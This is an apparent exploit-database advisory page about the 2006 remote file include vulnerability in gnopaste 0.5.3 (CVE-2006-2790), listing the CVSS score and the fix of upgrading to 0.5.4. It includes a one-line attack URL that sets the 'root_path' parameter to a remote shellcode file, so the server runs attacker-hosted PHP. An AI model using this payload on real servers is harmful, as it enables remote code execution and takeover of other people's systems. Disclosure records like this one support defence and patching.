header-logo
Suggest Exploit
vendor:
gnopaste
by:
SmokeZ
8.3
CVSS
HIGH
Remote File Include
94
CWE
Product Name: gnopaste
Affected Version From: 2000.5.3
Affected Version To: 2000.5.3
Patch Exists: YES
Related CWE: CVE-2006-2790
CPE: o:gnopaste:gnopaste:0.5.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

gnopaste <= 0.5.3 - Remote File Include Vulnerabilities

gnopaste is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.

Mitigation:

Upgrade to version 0.5.4 or later.
Source

Exploit-DB raw data:

# gnopaste <= 0.5.3 - Remote File Include Vulnerabilities
# Script site: http://sourceforge.net/projects/gnopaste
# made by SmokeZ (smoke.hes@gmail.com)

http://www.site.com/[gnopaste_path]/includes/common.php?root_path=SHELLCODE_URL.txt?

# milw0rm.com [2006-05-30]

Navigation

Suggest Exploit

Services By CQR